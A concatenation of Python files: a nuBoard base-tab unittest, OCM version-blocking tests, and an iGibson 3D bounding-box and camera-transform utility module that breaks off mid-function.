accel = [0.0, 1.0, 2.0]
time_series = TimeSeries(unit="meters_per_second_squared", time_stamps=list(time_stamps), values=list(accel))
result = MetricStatistics(
metric_computator="ego_acceleration",
name="ego_acceleration_statistics",
statistics=statistics,
time_series=time_series,
metric_category="Dynamic",
metric_score=1,
)
# Set up dummy metric file
key = MetricFileKey(
metric_name="ego_acceleration",
scenario_name=scenario_name,
log_name=log_name,
scenario_type=scenario_type,
planner_name=planner_name,
)
# Set up a dummy metric engine and save the results to a metric file.
metric_engine = MetricsEngine(main_save_path=metric_path, timestamp=0)
metric_files = {"ego_acceleration": [MetricFile(key=key, metric_statistics=[result])]}
metric_engine.write_to_files(metric_files=metric_files)
# Integrate to a metric file
metric_file_callback = MetricFileCallback(metric_save_path=str(metric_path))
metric_file_callback.on_run_simulation_end()
def setUp(self) -> None:
"""Set up a nuboard base tab."""
self.tmp_dir = tempfile.TemporaryDirectory()
self.nuboard_file = NuBoardFile(
simulation_main_path=self.tmp_dir.name,
metric_main_path=self.tmp_dir.name,
metric_folder="metrics",
simulation_folder="simulations",
aggregator_metric_folder="aggregator_metric",
current_path=Path(self.tmp_dir.name),
)
doc = Document()
log_name = 'dummy_log'
planner_name = "SimplePlanner"
scenario_type = "Test"
scenario_name = "Dummy_scene"
# Set up dummy metric files
metric_path = Path(self.nuboard_file.metric_main_path) / self.nuboard_file.metric_folder
metric_path.mkdir(exist_ok=True, parents=True)
self.set_up_dummy_metric(
metric_path=metric_path,
log_name=log_name,
planner_name=planner_name,
scenario_name=scenario_name,
scenario_type=scenario_type,
)
# Set up dummy simulation files
simulation_path = Path(self.nuboard_file.simulation_main_path) / self.nuboard_file.simulation_folder
simulation_path.mkdir(exist_ok=True, parents=True)
self.set_up_dummy_simulation(
simulation_path,
log_name=log_name,
planner_name=planner_name,
scenario_type=scenario_type,
scenario_name=scenario_name,
)
color_palettes = Category20[20] + Set3[12] + Bokeh[8]
experiment_file_data = ExperimentFileData(file_paths=[], color_palettes=color_palettes)
self.base_tab = BaseTab(doc=doc, experiment_file_data=experiment_file_data)
def test_update_experiment_file_data(self) -> None:
"""Test update experiment file data."""
self.base_tab.experiment_file_data.update_data(file_paths=[self.nuboard_file])
self.assertEqual(len(self.base_tab.experiment_file_data.available_metric_statistics_names), 1)
self.assertEqual(len(self.base_tab.experiment_file_data.simulation_scenario_keys), 1)
def test_file_paths_on_change(self) -> None:
"""Test file_paths_on_change feature."""
self.base_tab.experiment_file_data.update_data(file_paths=[self.nuboard_file])
self.assertRaises(
NotImplementedError, self.base_tab.file_paths_on_change, self.base_tab.experiment_file_data, [0]
)
def tearDown(self) -> None:
"""Remove all temporary folders and files."""
self.tmp_dir.cleanup()
if __name__ == "__main__":
unittest.main()
|
from unittest import TestCase
from unittest.mock import patch
from reconcile.utils.ocm import OCM
class TestVersionBlocked(TestCase):
@patch.object(OCM, '_init_access_token')
@patch.object(OCM, '_init_request_headers')
@patch.object(OCM, '_init_clusters')
# pylint: disable=arguments-differ
def setUp(self, ocm_init_access_token,
ocm_init_request_headers, ocm_init_clusters):
self.ocm = OCM('name', 'url', 'tid', 'turl', 'ot')
def test_no_blocked_versions(self):
result = self.ocm.version_blocked('1.2.3')
self.assertFalse(result)
def test_version_blocked(self):
self.ocm.blocked_versions = ['1.2.3']
result = self.ocm.version_blocked('1.2.3')
self.assertTrue(result)
def test_version_not_blocked(self):
self.ocm.blocked_versions = ['1.2.3']
result = self.ocm.version_blocked('1.2.4')
self.assertFalse(result)
def test_version_blocked_multiple(self):
self.ocm.blocked_versions = ['1.2.3', '1.2.4']
result = self.ocm.version_blocked('1.2.3')
self.assertTrue(result)
def test_version_blocked_regex(self):
self.ocm.blocked_versions = [r'^.*-fc\..*$']
result = self.ocm.version_blocked('1.2.3-fc.1')
self.assertTrue(result)
def test_version_not_blocked_regex(self):
self.ocm.blocked_versions = [r'^.*-fc\..*$']
result = self.ocm.version_blocked('1.2.3-rc.1')
self.assertFalse(result)
class TestVersionRegex(TestCase):
@patch.object(OCM, '_init_access_token')
@patch.object(OCM, '_init_request_headers')
@patch.object(OCM, '_init_clusters')
# pylint: disable=arguments-differ
def test_invalid_regex(self, ocm_init_access_token,
ocm_init_request_headers, ocm_init_clusters):
with self.assertRaises(TypeError):
OCM('name', 'url', 'tid', 'turl', 'ot',
blocked_versions=['['])
|
import numpy as np
import trimesh
import torch
from shapely.geometry import Polygon, Point
from gibson2.utils.mesh_util import homotrans, lookat
from configs import data_config
from utils.mesh_utils import normalize_to_unit_square
from utils.basic_utils import recursively_to, get_any_array
def vector_rotation(v1, v2, axis, left_hand=False, range_pi=False):
"""
Calculate rotation around axis in rad from v1 to v2, where v1 and v2 are 3-dim vectors.
The rotation is counter-clockwise when axis is pointing at viewer,
As defined in right-handed coordinate system.
Parameters
----------
v1: n x 3 numpy array or tensor
v2: n x 3 numpy array or tensor
Returns
-------
n-dim vector in the range of [0, 2 * pi)
"""
if isinstance(v1, torch.Tensor):
backend, atan2 = torch, torch.atan2
else:
backend, atan2 = np, np.arctan2
ori = atan2((backend.cross(v2, v1) * axis).sum(axis=-1), (v2 * v1).sum(axis=-1)) * (1. if left_hand else -1.)
if not range_pi:
ori = backend.remainder(ori, np.pi * 2)
return ori
def point_polygon_dis(points, polygon):
backend = torch if isinstance(points, torch.Tensor) else np
if (polygon[0] != polygon[-1]).any():
polygon = backend.cat([polygon, polygon[:1]], 0)
dis = backend.zeros([len(points), len(polygon) - 1], dtype=points.dtype)
if backend == torch:
dis = dis.to(points.device)
# find distance to each line segment
for i_line, (p1, p2) in enumerate(zip(polygon[:-1], polygon[1:])):
dis[:, i_line] = point_line_segment_dis(points, p1, p2)
# use nearest distance
dis = dis.min(axis=-1)
if backend == torch:
dis = dis[0]
# points inside room layout should have negative distance
layout_2d = Polygon(polygon)
inside_layout = [layout_2d.contains(Point(c)) for c in points]
dis[inside_layout] *= -1
return dis
def point_line_segment_dis(points, line_start, line_end):
backend = torch if isinstance(points, torch.Tensor) else np
line_vec = line_end - line_start
r = (line_vec * (points - line_start)).sum(-1) / backend.linalg.norm(line_vec, axis=-1) ** 2
line_length = backend.linalg.norm(line_vec, axis=-1)
dis_start = backend.linalg.norm(points - line_start, axis=-1)
dis_end = backend.linalg.norm(points - line_end, axis=-1)
dis_line = backend.sqrt(backend.abs(dis_start.pow(2) - (r * line_length).pow(2)) + 1e-8)
dis_start = dis_start * (r < 0)
dis_end = dis_end * (r > 1)
dis_line = dis_line * ((r <= 1) & (r > 0))
return dis_line + dis_start + dis_end
def interpolate_line(p1, p2, num=30):
t = np.expand_dims(np.linspace(0, 1, num=num, dtype=np.float32), 1)
points = p1 * (1 - t) + t * p2
return points
def num2bins(bins, loc):
'''
Given bins and value, compute where the value locates and the distance to the center.
:param bins: list
The bins, eg. [[-x, 0], [0, x]]
:param loc: float
The location
:return cls: int, bin index.
indicates which bin is the location for classification.
:return reg: float, [-0.5, 0.5].
the distance to the center of the corresponding bin.
'''
if bins.ndim == 1:
backend = torch if isinstance(loc, torch.Tensor) else np
dist = [backend.abs(loc - b) for b in bins]
dist = backend.stack(dist, -1)
cls = backend.argmin(dist, -1)
return cls
else:
width_bin = bins[0][1] - bins[0][0]
# get the distance to the center from each bin.
if isinstance(loc, torch.Tensor):
dist = [torch.abs(loc - (bn[0] + bn[1]) / 2) for bn in bins]
dist = torch.stack(dist, -1)
cls = torch.argmin(dist, -1)
bins = torch.tensor(bins, device=loc.device)
reg = (loc - bins[cls].mean(-1)) / width_bin
else:
dist = ([float(abs(loc - float(bn[0] + bn[1]) / 2)) for bn in bins])
cls = dist.index(min(dist))
reg = float(loc - float(bins[cls][0] + bins[cls][1]) / 2) / float(width_bin)
return cls, reg
def label_or_num_from_cls_reg(cls, reg=None, bins=None, return_score=False, threshold=0.5):
if isinstance(cls, torch.Tensor):
if cls.dtype == torch.float32:
if cls.shape[-1] == 1:
cls = cls.squeeze(-1)
score = torch.sigmoid(cls)
label = score > threshold
else:
score = torch.softmax(cls, dim=-1)
score, label = score.max(-1)
else:
label = cls
score = torch.ones_like(label, device=cls.device, dtype=torch.float32)
else:
label = cls
score = np.ones_like(label, dtype=np.float32)
if bins is None:
if cls.shape[-1] == 2 and reg is None:
if isinstance(cls, torch.Tensor):
bin_center = label.type(torch.bool)
else:
bin_center = label.astype(np.bool)
else:
bin_center = label
else:
if bins.ndim == 1:
bin_center = bins[label]
else:
bin_width = (bins[0][1] - bins[0][0])
bin_center = (bins[label, 0] + bins[label, 1]) / 2
if reg is None:
return (bin_center, score) if return_score else bin_center
if label is not cls:
reg = torch.gather(reg, 1, label.unsqueeze(-1)).squeeze(1)
num = bin_center + reg * bin_width
return (num, score) if return_score else num
def size2reg(size, class_id=None, avg_key='size_avg'):
size_avg = data_config.metadata[avg_key]
if class_id is not None:
size_avg = size_avg[class_id]
if isinstance(size, torch.Tensor):
size_avg = torch.FloatTensor(size_avg).to(size.device)
size_residual = size / size_avg - 1
return size_residual
def bins2layout(layout_total3d):
lo_ori_reg, lo_ori_cls, centroid_reg, size_reg = \
layout_total3d['ori_reg'], layout_total3d['ori_cls'], \
layout_total3d['centroid_reg'], layout_total3d['size_reg']
bins = recursively_to(data_config.metadata, dtype='tensor', device=lo_ori_reg.device)
cuboid_layout = {
'ori': label_or_num_from_cls_reg(lo_ori_cls, lo_ori_reg, bins['layout_ori_bins']),
'centroid_total3d': centroid_reg + bins['layout_centroid_avg'],
'size': (size_reg + 1) * bins['layout_size_avg']
}
return cuboid_layout
def bins2camera(layout_total3d):
pitch_cls, pitch_reg, roll_cls, roll_reg = \
layout_total3d['pitch_cls'], layout_total3d['pitch_reg'], \
layout_total3d['roll_cls'], layout_total3d['roll_reg']
pitch_bins = torch.FloatTensor(data_config.metadata['pitch_bins']).to(pitch_cls.device)
roll_bins = torch.FloatTensor(data_config.metadata['roll_bins']).to(pitch_cls.device)
return {
'pitch': label_or_num_from_cls_reg(pitch_cls, pitch_reg, pitch_bins),
'roll': label_or_num_from_cls_reg(roll_cls, roll_reg, roll_bins),
}
def bins2bdb3d(data):
bdb3d_pix = {}
objs = data['objs']
transform = IGTransform(data)
if 'K' in data['camera']:
bdb2d, bdb3d = objs['bdb2d'], objs['bdb3d']
bdb2d_center = torch.stack([bdb2d['x1'] + bdb2d['x2'], bdb2d['y1'] + bdb2d['y2']], 1) / 2
bdb2d_wh = torch.stack([bdb2d['x2'] - bdb2d['x1'], bdb2d['y2'] - bdb2d['y1']], 1)
bdb3d_pix['center'] = bdb2d_center - bdb2d_wh * objs['delta2d']
dis_name = 'dis' # try to regress dis instead of depth in Total3D
else:
bfov, bdb3d = objs['bfov'], objs['bdb3d']
bfov_center = torch.stack([bfov['lon'], bfov['lat']], 1)
bfov_wh = torch.stack([bfov['x_fov'], bfov['y_fov']], 1)
bdb3d_pix['center'] = transform.camrad2pix(bfov_center - bfov_wh * objs['delta2d'])
dis_name = 'dis'
bins = recursively_to(data_config.metadata, dtype='tensor', device=bdb3d_pix['center'].device)
size_avg, dis_bins, ori_bins = bins['size_avg'], bins['dis_bins'], bins['ori_bins']
bdb3d_pix['size'] = (bdb3d['size_reg'] + 1) * size_avg[objs['label'], :]
bdb3d_pix[dis_name], bdb3d_pix[dis_name + '_score'] = label_or_num_from_cls_reg(
bdb3d['dis_cls'], bdb3d['dis_reg'], dis_bins, return_score=True)
bdb3d_pix['ori'], bdb3d_pix['ori_score'] = label_or_num_from_cls_reg(
bdb3d['ori_cls'], bdb3d['ori_reg'], ori_bins, return_score=True)
return bdb3d_pix
def bdb3d_corners(bdb3d: (dict, np.ndarray)):
"""
Get ordered corners of given 3D bounding box dict or disordered corners
Parameters
----------
bdb3d: 3D bounding box dict
Returns
-------
8 x 3 numpy array of bounding box corner points in the following order:
right-forward-down
left-forward-down
right-back-down
left-back-down
right-forward-up
left-forward-up
right-back-up
left-back-up
"""
if isinstance(bdb3d, np.ndarray):
centroid = np.mean(bdb3d, axis=0)
z = bdb3d[:, -1]
surfaces = []
for surface in (bdb3d[z < centroid[-1]], bdb3d[z >= centroid[-1]]):
surface_2d = surface[:, :2]
center_2d = centroid[:2]
vecters = surface_2d - center_2d
angles = np.arctan2(vecters[:, 0], vecters[:, 1])
orders = np.argsort(-angles)
surfaces.append(surface[orders][(0, 1, 3, 2), :])
corners = np.concatenate(surfaces)
else:
corners = np.unpackbits(np.arange(8, dtype=np.uint8)[..., np.newaxis],
axis=1, bitorder='little', count=-5).astype(np.float32)
corners = corners - 0.5
if isinstance(bdb3d['size'], torch.Tensor):
corners = torch.from_numpy(corners).to(bdb3d['size'].device)
corners = IGTransform.obj2frame(corners, bdb3d)
return corners
def expand_bdb3d(bdb3d, dis):
bdb3d = bdb3d.copy()
size = bdb3d['size']
size = size + dis * 2
size[size <= 0.01] = 0.01
bdb3d['size'] = size
return bdb3d
def bdb3d_from_front_face(front_face, length):
"""
Get 3D bounding box dict from given front face and length
Parameters
----------
front_face: four 3D corners of front face
right-forward-down
left-forward-down
right-forward-up
left-forward-up
length: length along y axis (forward-backward axis)
Returns
-------
bdb3d dict
"""
up = front_face[2] - front_face[0] # z
left = front_face[1] - front_face[0] # x
back = np.cross(up, left)
back = back / np.linalg.norm(back) * length # y
basis = np.stack([left, back, up])
size = np.linalg.norm(basis, axis=1)
basis = basis.T / size
centroid = front_face.sum(0) / 4 + back / 2
return {
'centroid': centroid,
'basis': basis,
'size': size
}
def bdb3d_from_corners(corners: np.ndarray):
front_face = corners[(0, 1, 4, 5), :]
length = np.linalg.norm(corners[0] - corners[3])
bdb3d = bdb3d_from_front_face(front_face, length)
return bdb3d
bdb3d_axis_map = {'forward': [0, -1, 0], 'back': [0, 1, 0], 'left': [1, 0, 0], 'right': [-1, 0, 0],
'up': [0, 0, 1], 'down': [0, 0, -1], 'x': [1, 0, 0], 'y': [0, 1, 0], 'z': [0, 0, 1]}
def bdb3d_axis(bdb3d, axis='forward'):
basis = bdb3d['basis']
axis_obj = np.array(bdb3d_axis_map[axis], dtype=np.float32)
if isinstance(basis, torch.Tensor):
axis_obj = torch.tensor(axis_obj, dtype=basis.dtype, device=basis.device)
axis_ori = basis @ axis_obj
return axis_ori
cam_axis_map = {'forward': [0, 0, 1], 'back': [0, 0, 1], 'left': [-1, 0, 0], 'right': [1, 0, 0],
'up': [0, -1, 0], 'down': [0, 1, 0], 'x': [1, 0, 0], 'y': [0, 1, 0], 'z': [0, 0, 1]}
def cam_axis(camera=None, axis='forward'):
axis_cam3d = np.array(cam_axis_map[axis], dtype=np.float32)
if camera is not None:
cam3d2world = camera['cam3d2world']
if isinstance(cam3d2world, torch.Tensor):
axis_cam3d = torch.tensor(axis_cam3d, dtype=cam3d2world.dtype, device=cam3d2world.device)
axis_cam3d = axis_cam3d[None, -1, None].expand(len(cam3d2world), -1, -1)
axis_cam3d = cam3d2world[..., :3, :3] @ axis_cam3d
return axis_cam3d
def points2bdb2d(points):
points = np.stack([points['x'], points['y']]).T if isinstance(points, dict) else points
if isinstance(points, torch.Tensor):
xy_max = torch.max(points, -2)[0]
xy_min = torch.min(points, -2)[0]
else:
xy_max = points.max(-2)
xy_min = points.min(-2)
return {
'x1': xy_min[..., 0],
'x2': xy_max[..., 0],
'y1': xy_min[..., 1],
'y2': xy_max[..., 1]
}
def contour2bfov(contour, height=None, width=None, camera=None):
if camera is None:
camera = {'height': height, 'width': width}
transform = IGTransform({'camera': camera})
contour_np = np.stack([contour['x'], contour['y']]).T if isinstance(contour, dict) else contour
bdb2d = points2bdb2d(contour_np)
center_pix = np.array([(bdb2d['x1'] + bdb2d['x2']), (bdb2d['y1'] + bdb2d['y2'])], dtype=np.float32) / 2
center_rad = transform.campix2rad(center_pix)
center_world = transform.campix2world(center_pix, 1.)
contour_world = transform.campix2world(contour_np, 1.)
transform = transform.copy()
transform.look_at(center_world)
contour_pers3d = transform.world2cam3d(contour_world)
contour_rad = transform.cam3d2rad(contour_pers3d)
min_rad = contour_rad.min(axis=0)
max_rad = contour_rad.max(axis=0)
fov_rad = np.max(np.abs(np.stack([max_rad, min_rad])), 0) * 2
bfov = {'lon': center_rad[0], 'lat': center_rad[1], 'x_fov': fov_rad[0], 'y_fov': fov_rad[1]}
bfov = {k: float(v) for k, v in bfov.items()}
return bfov
class IGTransform:
"""
3D transformations for iGibson data
world: right-hand coordinate of iGibson (z-up)
cam3d: x-right, y-down, z-forward
cam2d: x-right, y-down
object: x-left, y-back, z-up (defined by iGibson)
"""
def __init__(self, data: dict=None, split='objs'):
self.data = data
self.camera = data['camera'] if data else {}
self.split = split
if isinstance(self.camera, dict) and self.camera \
and 'world2cam3d' not in self.camera and 'cam3d2world' not in self.camera:
if any(k not in self.camera for k in ('pos', 'target', 'up')):
self.set_camera_to_world_center()
else:
self.look_at()
@classmethod
def level_look_at(cls, data, target):
data = data.copy()
camera = data['camera'].copy()
if isinstance(target, torch.Tensor):
target = target.clone()
else:
target = target.copy()
camera['target'] = target
camera['target'][..., -1] = camera['target'][..., -1]
data['camera'] = camera
recentered_trans = cls(data)
return recentered_trans
@classmethod
def world_centered(cls, camera):
transform_centered = cls()
transform_centered.set_camera_to_world_center()
sample = get_any_array(camera)
if isinstance(sample, torch.Tensor):
transform_centered.camera = recursively_to(
transform_centered.camera, dtype='tensor', device=sample.device)
transform_centered.camera.update({k: camera[k][0] for k in ('height', 'width')})
return transform_centered
def look_at(self, camera=None):
if camera is not None:
if isinstance(camera, dict):
self.camera = camera.copy()
else:
self.camera['target'] = camera
world2cam3d = lookat(self.camera['pos'], self.camera['target'], self.camera['up'])
world2cam3d = np.array([
[1, 0, 0, 0],
[0, -1, 0, 0],
[0, 0, -1, 0],
[0, 0, 0, 1]
], dtype=np.float32) @ world2cam3d
self.camera['world2cam3d'] = world2cam3d
self.camera['cam3d2world'] = np.linalg.inv(world2cam3d)
return self
def get_camera_angle(self):
"""
Get the yaw, pitch, roll angle from the camera.
The initial state of camera is defined as:
world_x-forward, world_y-left, world_z-up
# The rotation is right-handed around world frame (?) with the following order (?):
# yaw-world_z, pitch-world_y, roll-world_z
Returns
-------
yaw, pitch, roll angles in rad
"""
R = self['cam3d2world']
backend, atan2 = (torch, torch.atan2) if isinstance(R, torch.Tensor) else (np, np.arctan2)
yaw = atan2(R[..., 1, 2], R[..., 0, 2])
pitch = - atan2(R[..., 2, 2], backend.sqrt(R[..., 0, 2] ** 2 + R[..., 1, 2] ** 2))
roll = atan2(R[..., 2, 0], - R[..., 2, 1])
return yaw, pitch, roll
def set_camera_angle(self, yaw, pitch, roll):
"""
Set camera rotation from yaw, pitch, roll angles in rad.
Parameters
----------
yaw, pitch, roll angles in rad
"""
pitch = -pitch
roll = -roll
R = self.camera['cam3d2world']
use_torch = isinstance(R, torch.Tensor)
R = R.clone() if use_torch else R.copy()
backend, inverse = (torch, torch.inverse) if use_torch else (np, np.linalg.inv)
if use_torch:
yaw, pitch, roll = [torch.tensor(v) if v is not torch.Tensor else v for v in (yaw, pitch, roll)]
R[..., 0, 2] = backend.cos(yaw) * backend.cos(pitch)
R[..., 0, 1] = - backend.sin(yaw) * backend.sin(roll) + backend.cos(yaw) * backend.cos(roll) * backend.sin(pitch)
R[..., 0, 0] = backend.cos(roll) * backend.sin(yaw) + backend.cos(yaw) * backend.sin(pitch) * backend.sin(roll)
R[..., 2, 2] = backend.sin(pitch)
R[..., 2, 1] = - backend.cos(pitch) * backend.cos(roll)
R[..., 2, 0] = - backend.cos(pitch) * backend.sin(roll)
R[..., 1, 2] = backend.cos(pitch) * backend.sin(yaw)
R[..., 1, 1] = backend.cos(yaw) * backend.sin(roll) + backend.cos(roll) * backend.sin(yaw) * backend.sin(pitch)
R[..., 1, 0] = - backend.cos(yaw) * backend.cos(roll) + backend.sin(yaw) * backend.sin(pitch) * backend.sin(roll)
self.camera['cam3d2world'] = R
self.camera['world2cam3d'] = inverse(R)
target = self.camera['target']
target = target.clone() if use_torch else target.copy()
target[..., :2] = 0
target[..., 2] = 1
self.camera['target'] = self.cam3d2world(target)
up = self.camera['up']
up = up.clone() if use_torch else up.copy()
up[..., (0, 2)] = 0
up[..., 1] = -1
self.camera['up'] = (self.camera['cam3d2world'][..., :3, :3] @ up[..., None])[..., 0]
return self
def copy(self):
data = self.data.copy()
data['camera'] = self.camera.copy()
return IGTransform(data, split=self.split)
def set_camera_to_world_center(self):
self.camera['pos'] = np.zeros(3, np.float32)
self.camera['target'] = np.array([1, 0, 0], np.float32)
self.camera['up'] = np.array([0, 0, 1], np.float32)
self.look_at()
return self
def set_camera_like_total3d(self):
# set world frame coordinate to camera center
# and rotate x axis to camera y-z plane around z axis
pos = self.camera['pos']
use_torch = isinstance(pos, torch.Tensor)
inverse = torch.inverse if use_torch else np.linalg.inv
self.camera['pos'] = pos.clone() if use_torch else pos.copy()
self.camera['pos'][:] = 0
cam3d2world = self.camera['cam3d2world']
cam3d2world = cam3d2world.clone() if isinstance(pos, torch.Tensor) else cam3d2world.copy()
cam3d2world[..., :3, 3] = 0
self.camera['cam3d2world'] = cam3d2world
self.camera['world2cam3d'] = inverse(cam3d2world)
_, pitch, roll = self.get_camera_angle()
self.set_camera_angle(0., pitch, roll)
return self
def set_camera_level(self):
self.camera['target'][-1] = self.camera['pos'][-1]
self.camera['up'] = np.array([0, 0, 1], np.float32)
self.look_at()
return self
def camrad2pix(self, camrad):
"""
Transform longitude and latitude of a point to panorama pixel coordinate.
Parameters
----------
camrad: n x 2 numpy array
Returns
-------
n x 2 numpy array of xy coordinate in pixel
x: (left) 0 --> (width - 1) (right)
y: (up) 0 --> (height - 1) (down)
"""
if 'K' in self.camera:
raise NotImplementedError
if isinstance(camrad, torch.Tensor):
campix = torch.empty_like(camrad, dtype=torch.float32)
else:
campix = np.empty_like(camrad, dtype=np.float32)
width, height = self['width'], self['height']
if isinstance(camrad, torch.Tensor):
width, height = [x.view([-1] + [1] * (camrad.dim() - 2)) for x in (width, height)]
campix[..., 0] = camrad[..., 0] * width / (2. * np.pi) + width / 2. + 0.5
campix[..., 1] = camrad[..., 1] * height / np.pi + height / 2. + 0.5
return campix
def campix2rad(self, campix):
backend, atan2 = (torch, torch.atan2) if isinstance(campix, torch.Tensor) else (np, np.arctan2)
camrad = backend.empty_like(campix, dtype=backend.float32)
if 'K' in self.camera:
camrad[..., 0] = atan2(
campix[..., 0] - self['K'][..., 0, 2],
self['K'][..., 0, 0]
)
camrad[..., 1] = atan2(
campix[..., 1] - self['K'][..., 1, 2],
backend.sqrt(self['K'][..., 0, 0] ** 2 + (campix[..., 0] - self['K'][..., 0, 2]) ** 2)
/ self['K'][..., 0, 0] * self['K'][..., 1, 1]
)
else:
width, height = self['width'], self['height']
camrad[..., 0] = (campix[..., 0] - width / 2. - 0.5) / width * (2. * np.pi)
camrad[..., 1] = (campix[..., 1] - height / 2. - 0.5) / height * np.pi
return camrad
def cam3d2rad(self, cam3d):
"""
Transform 3D points in camera coordinate to longitude and latitude.
Parameters
----------
cam3d: n x 3 numpy array or bdb3d dict
Returns
-------
n x 2 numpy array of longitude and latitude in radiation
first rotate left-right, then rotate up-down
longitude: (left) -pi -- 0 --> +pi (right)
latitude: (up) -pi/2 -- 0 --> +pi/2 (down)
"""
backend, atan2 = (torch, torch.atan2) if isinstance(cam3d, torch.Tensor) else (np, np.arctan2)
lon = atan2(cam3d[..., 0], cam3d[..., 2])
lat = backend.arcsin(cam3d[..., 1] / backend.linalg.norm(cam3d, axis=-1))
return backend.stack([lon, lat], -1)
def camrad23d(self, rad, dis):
backend = torch if isinstance(rad, torch.Tensor) else np
proj_dis = backend.cos(rad[..., 1]) * dis
x = backend.sin(rad[..., 0]) * proj_dis
y = backend.sin(rad[..., 1]) * dis
z = backend.cos(rad[..., 0]) * proj_dis
cam3d = backend.stack([x, y, z]).T
return cam3d
def camrad2world(self, rad, dis):
return self.cam3d2world(self.camrad23d(rad, dis))
def world2camrad(self, world):
return self.cam3d2rad(self.world2cam3d(world))
def cam3d2pix(self, cam3d):
"""
Transform 3D points from camera coordinate to pixel coordinate.
Parameters
----------
cam3d: n x 3 numpy array or bdb3d dict
Returns
-------
for 3D points: n x 2 numpy array of xy in pixel.
x: (left) 0 --> width - 1 (right)
y: (up) 0 --> height - 1 (down)
"""
if isinstance(cam3d, dict):
campix = self.world2campix(self.cam3d2world(cam3d))
else:
if 'K' in self.camera:
campix = self.transform(self.camera['K'], cam3d)
else:
campix = self.camrad2pix(self.cam3d2rad(cam3d))
return campix
def campix23d(self, campix, dis=None):
if isinstance(campix, dict) and dis is None:
cam3d = self.world2cam3d(self.campix2world(campix, dis))
else:
cam3d = self.camrad23d(self.campix2rad(campix), dis)
return cam3d
@staticmethod
def transform(transform_matrix, input):
"""
Transform 3D points or 3D bounding boxes with given transformation matrix.
Parameters
----------
transform_matrix: 4 x 4 transformation matrix
input: n x 3 numpy array or bdb3d dict or Trimesh
Returns
-------
n x 3 numpy array or bdb3d dict
"""
if isinstance(input, trimesh.Trimesh):
input = input.copy()
input.vertices = IGTransform.transform(transform_matrix, input.vertices)
return input
elif isinstance(input, dict):
size = input['size']
if isinstance(size, torch.Tensor):
size = size.clone()
else:
size = size.copy()
output = {
'centroid': IGTransform.transform(transform_matrix, input['centroid']),
'basis': transform_matrix[..., :3, :3] @ input['basis'],
'size': size
}
else:
output = IGTransform.homotrans(transform_matrix, input)
return output
def world2cam3d(self, world):
"""
Transform 3D points or 3D bounding boxes from world coordinate frame to camera coordinate frame.
world: right-hand coordinate of iGibson (z-up)
cam3d: x-right, y-down, z-forward
Parameters
----------
cam3d: n x 3 numpy array or bdb3d dict
Returns
-------
n x 3 numpy array or bdb3d dict
"""
return self.transform(self['world2cam3d'], world)
def cam3d2world(self, cam3d):
return self.transform(self['cam3d2world'], cam3d)
def ori2basis(self, ori, center=None):
if isinstance(ori, dict):
if isinstance(ori['size'], torch.Tensor):
if 'centroid' in ori:
centroid = ori['centroid'].clone()
size = ori['size'].clone()
centroid_total3d = ori['centroid_total3d'].clone()
else:
if 'centroid' in ori:
centroid = ori['centroid'].copy()
centroid_total3d = ori['centroid_total3d'].copy()
size = ori['size'].copy()
if 'centroid_total3d' in ori and 'K' in self.camera:
trans_centered = self.copy()
trans_centered.set_camera_like_total3d()
centroid_cam3d = trans_centered.world2cam3d(centroid_total3d)
centroid = self.cam3d2world(centroid_cam3d)
basis = {
'basis': self.ori2basis(ori['ori']),
'centroid': centroid,
'centroid_total3d': centroid_total3d,
'size': size
}
else:
backend = torch if isinstance(ori, torch.Tensor) else np
cam_yaw, _, _ = self.get_camera_angle()
if 'K' in self.camera:
yaw = cam_yaw - ori
else:
lon = self.campix2rad(center)[..., 0]
yaw = cam_yaw - lon - ori # ori and lon are counter-clockwise about z axis (from above)
yaw += np.pi / 2 # z axis of the camera rotates from x axis of the world coordinate
if isinstance(yaw, torch.Tensor):
basis = torch.zeros((len(yaw), 3, 3), device=yaw.device)
else:
basis = np.zeros((3, 3), dtype=np.float32)
basis[..., 0, 0] = backend.cos(yaw)
basis[..., 0, 1] = - backend.sin(yaw)
basis[..., 1, 0] = backend.sin(yaw)
basis[..., 1, 1] = backend.cos(yaw)
basis[..., 2, 2] = 1
return basis
def campix2world(self, campix, dis=None):
if isinstance(campix, dict):
if isinstance(campix['size'], torch.Tensor):
size = campix['size'].clone()
else:
size = campix['size'].copy()
world = {
'centroid': self.campix2world(campix['center'], campix['dis']),
'basis': self.ori2basis(campix['ori'], campix.get('center')),
'size': size
}
else:
world = self.cam3d2world(self.campix23d(campix, dis=dis))
return world
def basis2ori(self, basis, centroid=None):
"""
Transform basis to ori based on different definitions of ori for panoramic and perspective image.
Orientation: Defined as the left-handed rotation from line_of_sight to forward vector of object
around up axis of the world frame.
line_of_sight: For panoramic image, is defined as the direction from camera center to object centroid.
For perspective image, is defined as the direction of camera forward.
Parameters
----------
basis: Basis rotation matrix or bdb3d dict
centroid: For panoramic image, the centroid of object is required
Returns
-------
Orientation in rad or bdb3d dict.
When output bdb3d, it will also include a parameter 'centroid_total3d',
indicating the centroid of bdb3d in Total3D frame
"""
if isinstance(basis, dict):
if isinstance(basis['size'], torch.Tensor):
if 'centroid_total3d' in basis:
centroid_total3d = basis['centroid_total3d'].clone()
centroid = basis['centroid'].clone()
size = basis['size'].clone()
else:
if 'centroid_total3d' in basis:
centroid_total3d = basis['centroid_total3d'].copy()
centroid = basis['centroid'].copy()
size = basis['size'].copy()
if 'centroid' in basis and 'K' in self.camera:
trans_centered = self.copy()
trans_centered.set_camera_like_total3d()
centroid_cam3d = self.world2cam3d(centroid)
centroid_total3d = trans_centered.cam3d2world(centroid_cam3d)
ori = {
'ori': self.basis2ori(basis['basis']),
'centroid': centroid,
'centroid_total3d': centroid_total3d,
'size': size
}
else:
obj_forward = bdb3d_axis({'basis': basis})
if 'K' in self.camera:
# use the definition of orientation in Total3D
line_of_sight = self.camera['target'] - self.camera['pos']
else:
line_of_sight = centroid - self.camera['pos']
ori = vector_rotation(
line_of_sight, obj_forward, bdb3d_axis({'basis': basis}, 'up'),
left_hand=True, range_pi=True
)
return ori
def world2campix(self, world):
"""
Transform 3D points or 3D bounding boxes from world coordinate to pixel coordinate.
Parameters
----------
world: n x 3 numpy array or bdb3d dict
Returns
-------
for 3D points: n x 2 numpy array of xy in pixel.
x: (left) 0 --> width - 1 (right)
y: (up) 0 --> height - 1 (down)
for 3D bounding boxes: dict{
'centroid': centroid projected to camera plane
'size': original bounding box size
'dis': distance from centroid to camera in meters
'depth': depth of centroid
'ori': orientation of object in rad clockwise to line of sight (from above), [0, 2 * pi]
}
"""
if isinstance(world, dict):
if isinstance(world['size'], torch.Tensor):
backend = torch
size = world['size'].clone()
else:
backend = np
size = world['size'].copy()
